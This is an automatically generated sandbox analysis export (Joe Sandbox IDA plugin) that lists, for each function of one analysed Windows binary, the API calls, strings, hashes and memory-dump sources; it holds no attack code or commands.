Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 87d5e36c90795493a9f0d97f1e1c1f30b0115de3743cab8352f5d08b0817251b
Instruction ID: fc1bec9cc09ad9c550abbf76c952b57a6dc9197addf8969d77d3df08565c5919
Opcode Fuzzy Hash: 87d5e36c90795493a9f0d97f1e1c1f30b0115de3743cab8352f5d08b0817251b
Instruction Fuzzy Hash: D2E1D432E00626ABCB149F78C851BEDFBB8BF94750F55C119E466A7250DF30AE858790

Function 009744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0099CC08), ref: 00974527
_wcslen.LIBCMT ref: 0097453B
_wcslen.LIBCMT ref: 00974599
_wcslen.LIBCMT ref: 009745F4
_wcslen.LIBCMT ref: 0097463F
_wcslen.LIBCMT ref: 009746A7

Part of subcall function 0091F9F2: _wcslen.LIBCMT ref: 0091F9FD

GetDriveTypeW.KERNEL32(?,009C6BF0,00000061), ref: 00974743

Strings

all, xrefs: 00974531, 00974536
cdrom, xrefs: 0097458F, 00974594
removable, xrefs: 009745EA, 009745EF
network, xrefs: 0097469D, 009746A2
fixed, xrefs: 00974635, 0097463A
unknown, xrefs: 00974708
ramdisk, xrefs: 009746F1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 981a18bb2f47400d57a4731e370dced2009f1923cc6a704b050bd4e46c6b7df9
Instruction ID: 100fb10fd1990fe8ffb245f4913f877ff1acd4d976c952d0d80de4b3712d2553
Opcode Fuzzy Hash: 981a18bb2f47400d57a4731e370dced2009f1923cc6a704b050bd4e46c6b7df9
Instruction Fuzzy Hash: A0B1D2726083129FC714DF28C890A6AB7E9BFE5764F50891DF49AC7292E730DD44CB92

Function 0098AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0098B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0098B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0098B1D4
_wcslen.LIBCMT ref: 0098B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098B236
_wcslen.LIBCMT ref: 0098B332

Part of subcall function 009705A7: GetStdHandle.KERNEL32(000000F6), ref: 009705C6

_wcslen.LIBCMT ref: 0098B34B
_wcslen.LIBCMT ref: 0098B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0098B3B6
GetLastError.KERNEL32(00000000), ref: 0098B407
CloseHandle.KERNEL32(?), ref: 0098B439
CloseHandle.KERNEL32(00000000), ref: 0098B44A
CloseHandle.KERNEL32(00000000), ref: 0098B45C
CloseHandle.KERNEL32(00000000), ref: 0098B46E
CloseHandle.KERNEL32(?), ref: 0098B4E3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 19a80f50ce5e6dc34dee927391acdeaa040a7ef47f7b65c97bc1369fab932dd5
Instruction ID: a14721e42fe1e5c7dc9ac03e76cace208ac58df93bee22fec458d17b34701bd6
Opcode Fuzzy Hash: 19a80f50ce5e6dc34dee927391acdeaa040a7ef47f7b65c97bc1369fab932dd5
Instruction Fuzzy Hash: 43F16B716082009FC714EF24C891B6EBBE5AFC5714F18895DF89A9B3A2DB31EC45CB52

Function 0090326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(009D1990), ref: 00942F8D
GetMenuItemCount.USER32(009D1990), ref: 0094303D
GetCursorPos.USER32(?), ref: 00943081
SetForegroundWindow.USER32(00000000), ref: 0094308A
TrackPopupMenuEx.USER32(009D1990,00000000,?,00000000,00000000,00000000), ref: 0094309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009430A9

Strings

0, xrefs: 0090327D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 32bcef107ac24146de27c8167252a04f5b37d4896b3519fc5c030aa61f56f461
Instruction ID: 490f8dd61047312a6cbb3c3708b4f212297773f56e0c775e149759fa1cabdfc2
Opcode Fuzzy Hash: 32bcef107ac24146de27c8167252a04f5b37d4896b3519fc5c030aa61f56f461
Instruction Fuzzy Hash: 50715971644206BFEB258F28CC49FAABF6DFF01364F204216F524AA1E0C7B1AD54DB90

Function 00996CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00996DEB

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00996E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00996E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00996E94
DestroyWindow.USER32(?), ref: 00996EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00900000,00000000), ref: 00996EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00996EFD
GetDesktopWindow.USER32 ref: 00996F16
GetWindowRect.USER32(00000000), ref: 00996F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00996F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00996F4D

Part of subcall function 00919944: GetWindowLongW.USER32(?,000000EB), ref: 00919952

Strings

0, xrefs: 00996D98
tooltips_class32, xrefs: 00996E58, 00996EDD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 167f08537feb9dfac0ec2dc76931891f43e4492fce45221ad1e1806100979a36
Instruction ID: 9babf9d7970ebfc76e850aec12f567e43f310057ed91926aa8bb236ae55c4f59
Opcode Fuzzy Hash: 167f08537feb9dfac0ec2dc76931891f43e4492fce45221ad1e1806100979a36
Instruction Fuzzy Hash: 3E7167B5148245AFDB21CF5CEC58FBABBE9FB89304F44081EF989872A1C770A945DB11

Function 0099911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

DragQueryPoint.SHELL32(?,?), ref: 00999147

Part of subcall function 00997674: ClientToScreen.USER32(?,?), ref: 0099769A
Part of subcall function 00997674: GetWindowRect.USER32(?,?), ref: 00997710
Part of subcall function 00997674: PtInRect.USER32(?,?,00998B89), ref: 00997720

SendMessageW.USER32(?,000000B0,?,?), ref: 009991B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009991BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009991DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00999225
SendMessageW.USER32(?,000000B0,?,?), ref: 0099923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00999255
SendMessageW.USER32(?,000000B1,?,?), ref: 00999277
DragFinish.SHELL32(?), ref: 0099927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00999371

Strings

@GUI_DRAGID, xrefs: 009992E9
@GUI_DRAGFILE, xrefs: 00999320
@GUI_DROPID, xrefs: 0099929E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 52c5f16ab15015993d58a57a4e26ae29a80293f1576a4e3de90e475bbf92d673
Instruction ID: 197129f6bc54279d114399133f97f2a2d33eae2a37066dc3372c5cceec99d58e
Opcode Fuzzy Hash: 52c5f16ab15015993d58a57a4e26ae29a80293f1576a4e3de90e475bbf92d673
Instruction Fuzzy Hash: A9616C72508301AFD701DF68DC85EAFBBE8EFC9750F40491EF595922A1DB309A49CB62

Function 0097C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0097C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0097C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0097C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0097C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0097C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0097C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0097C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0097C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0097C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0097C5F0
InternetCloseHandle.WININET(00000000), ref: 0097C5FB

Strings

, xrefs: 0097C575

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 732bbb83f39207fe7b84b7b1f0dea351838d1f78468e54248b8c8dfc2941d672
Instruction ID: 0a7a35a3214f18cbec0d98a9714ae79a7ffd91fabeb3f0244b1ca8350001c741
Opcode Fuzzy Hash: 732bbb83f39207fe7b84b7b1f0dea351838d1f78468e54248b8c8dfc2941d672
Instruction Fuzzy Hash: CA514DF2504605BFDB218FA4CD88AAB7BBCFF08754F00841EF94996210DB35E944AB60

Function 0099856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00998592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985BA
GlobalLock.KERNEL32(00000000), ref: 009985C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985D7
GlobalUnlock.KERNEL32(00000000), ref: 009985E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009985F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0099FC38,?), ref: 00998611
GlobalFree.KERNEL32(00000000), ref: 00998621
GetObjectW.GDI32(?,00000018,?), ref: 00998641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00998671
DeleteObject.GDI32(?), ref: 00998699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009986AF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4b082ace321ca2453e5634f689d9e171890ecd9fa964861d8a8a0d9f09c99ad7
Instruction ID: f902b5e058427cc8c0fac6bc72aa39ed331ac3a415f5bde9efbe8b5d52c6ac01
Opcode Fuzzy Hash: 4b082ace321ca2453e5634f689d9e171890ecd9fa964861d8a8a0d9f09c99ad7
Instruction Fuzzy Hash: 1A4129B5604204AFDB119FA9CC48EAF7BBCEF89715F104059F915EB260DB319901DB20

Function 009714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00971502
VariantCopy.OLEAUT32(?,?), ref: 0097150B
VariantClear.OLEAUT32(?), ref: 00971517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009715FB
VarR8FromDec.OLEAUT32(?,?), ref: 00971657
VariantInit.OLEAUT32(?), ref: 00971708
SysFreeString.OLEAUT32(?), ref: 0097178C
VariantClear.OLEAUT32(?), ref: 009717D8
VariantClear.OLEAUT32(?), ref: 009717E7
VariantInit.OLEAUT32(00000000), ref: 00971823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00971625
Default, xrefs: 009716AF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: d9f22624a9e60a8c07a8422e4a7dac3048a36a259c5efc76ed29c5ce17264487
Instruction ID: cb13983a17a7d2c9676d821657dde66d5cf9226b51e044427c135ccd29f7980d
Opcode Fuzzy Hash: d9f22624a9e60a8c07a8422e4a7dac3048a36a259c5efc76ed29c5ce17264487
Instruction Fuzzy Hash: 98D1F072A04119EBDF089F68E885BBDB7B9BF84704F14C45AF44AAB190DB34DC41DB61

Function 0098B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 0098C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0098B6AE,?,?), ref: 0098C9B5
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098C9F1
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA68
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0098B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0098B80A
RegCloseKey.ADVAPI32(?), ref: 0098B87E
RegCloseKey.ADVAPI32(?), ref: 0098B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0098B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0098B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0098B922
FreeLibrary.KERNEL32(00000000), ref: 0098B983
RegCloseKey.ADVAPI32(00000000), ref: 0098B994

Strings

RegDeleteKeyExW, xrefs: 0098B8FE
advapi32.dll, xrefs: 0098B8ED

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: bb3e124c2c4300487fb6b3fb44eb8655eabb6ae10929aa0110c991f612e9162e
Instruction ID: edebb26a86c38f842ec071dbd002172503d8fd6be207613d63a659f19294d0d0
Opcode Fuzzy Hash: bb3e124c2c4300487fb6b3fb44eb8655eabb6ae10929aa0110c991f612e9162e
Instruction Fuzzy Hash: 21C18D71208201AFD714EF14C495F2ABBE5BF84318F18855CF59A8B7A2CB36ED45CB91

Function 0098255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009825D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009825E8
CreateCompatibleDC.GDI32(?), ref: 009825F4
SelectObject.GDI32(00000000,?), ref: 00982601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0098266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009826AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009826D0
SelectObject.GDI32(?,?), ref: 009826D8
DeleteObject.GDI32(?), ref: 009826E1
DeleteDC.GDI32(?), ref: 009826E8
ReleaseDC.USER32(00000000,?), ref: 009826F3

Strings

(, xrefs: 0098268D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 320f21ac7c16b0910bbbc2beccc2296e539e517cad801b760c6d173a512949e0
Instruction ID: 348a12f0835d2a2a45d59a4ac7226555862257500d8ff00d20a9426324cd6c98
Opcode Fuzzy Hash: 320f21ac7c16b0910bbbc2beccc2296e539e517cad801b760c6d173a512949e0
Instruction Fuzzy Hash: 4761F2B5D04219EFCF14DFA8DC84AAEBBB5FF48310F20852AE955A7350E770A9419F60

Function 0093DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0093DAA1

Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D659
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D66B
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D67D
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D68F
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6A1
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6B3
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6C5
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6D7
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6E9
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D6FB
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D70D
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D71F
Part of subcall function 0093D63C: _free.LIBCMT ref: 0093D731

_free.LIBCMT ref: 0093DA96

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 0093DAB8
_free.LIBCMT ref: 0093DACD
_free.LIBCMT ref: 0093DAD8
_free.LIBCMT ref: 0093DAFA
_free.LIBCMT ref: 0093DB0D
_free.LIBCMT ref: 0093DB1B
_free.LIBCMT ref: 0093DB26
_free.LIBCMT ref: 0093DB5E
_free.LIBCMT ref: 0093DB65
_free.LIBCMT ref: 0093DB82
_free.LIBCMT ref: 0093DB9A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: cd2cff68d46b72c477bebe9362cda61faecd6b2842d12f82162b7a81c92943a7
Instruction ID: ab09bbd267c17e2d0e4888d46838b1940d2573328d299c7f6150f5a78834fea4
Opcode Fuzzy Hash: cd2cff68d46b72c477bebe9362cda61faecd6b2842d12f82162b7a81c92943a7
Instruction Fuzzy Hash: 4D3157766053049FEB22AB39F955B5AB7ECFF40310F154469E449D7191DB30EC808F20

Function 0096365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0096369C
_wcslen.LIBCMT ref: 009636A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00963797
GetClassNameW.USER32(?,?,00000400), ref: 0096380C
GetDlgCtrlID.USER32(?), ref: 0096385D
GetWindowRect.USER32(?,?), ref: 00963882
GetParent.USER32(?), ref: 009638A0
ScreenToClient.USER32(00000000), ref: 009638A7
GetClassNameW.USER32(?,?,00000100), ref: 00963921
GetWindowTextW.USER32(?,?,00000400), ref: 0096395D

Strings

%s%u, xrefs: 00963734

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 70a6e036b385f62d7ab9c994596e0e8fc2d74f7508b116a85e6fe20dc2526889
Instruction ID: 5dc6088378f65d17a0861d343af33f582829244b4bdcbccf249d22cfff3c9d6c
Opcode Fuzzy Hash: 70a6e036b385f62d7ab9c994596e0e8fc2d74f7508b116a85e6fe20dc2526889
Instruction Fuzzy Hash: F5918E71204606EFD719DF24C885FEAB7ADFF44354F00862AF99AD2190DB30EA55CBA1

Function 00964954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00964994
GetWindowTextW.USER32(?,?,00000400), ref: 009649DA
_wcslen.LIBCMT ref: 009649EB
CharUpperBuffW.USER32(?,00000000), ref: 009649F7
